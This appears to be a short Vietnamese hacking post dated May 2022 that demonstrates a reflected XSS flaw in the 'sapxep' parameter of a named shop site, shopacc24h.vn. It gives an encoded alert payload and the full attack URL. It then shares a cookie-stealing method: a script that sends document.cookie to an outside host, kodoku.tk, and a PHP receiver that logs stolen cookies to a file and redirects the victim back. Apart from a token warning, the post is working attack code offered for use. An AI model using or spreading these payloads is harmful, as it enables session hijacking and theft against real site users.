Cập nhật ngày 14/05/2022
Lũ ăn không ngồi rồi đừng dùng đi phá người khác nghe chưa!!!
Demo tấn công: shopacc24h.vn (chắc fix rồi)
Truy cập
https://shopacc24h.vn/?sapxep=
Kèm theo đoạn script đã được encode sẽ thấy lỗi Xss
%3C/script%3E%3Cscript%3E%20alert(%27Xss%27)%3C/script%3E
https://shopacc24h.vn/?sapxep=%3C/script%3E%3Cscript%3E%20alert(%27Xss%27)%3C/script%3E
Ngoài ra, chia sẻ thêm cho anh em cách chôm cookie:
Cứ như trên, chèn đoạn script này vào (encode trước khi chèn vào)
<script> window.location="http://kodoku.tk/test.php?cc="+document.cookie+"&url=http://shopacc24h.vn"; </script>
Sau khi người dùng truy cập đường dẫn, nó sẽ Location đến 1 web mình đã tạo, kèm parameter "cc" và "url". Vậy là tại trang kodoku.tk/test.php ae code 1 đoạn code nhỏ như sau để lưu cookie và location ngược lại url main!
<?php
$myFile = "cookie.txt";
$fh = fopen($myFile, 'a+');
$bien='Cookie: '.$_REQUEST['cc']."|Location: ".$_REQUEST['url']."\n";
fwrite($fh,$bien);
fclose($fh);
echo("<script>window.location='".$_REQUEST['url']."';</script>");
?>
Vậy là cookie của người click link trên đã lưu lại vào file cookie.txt
Nguồn: kodoku-san
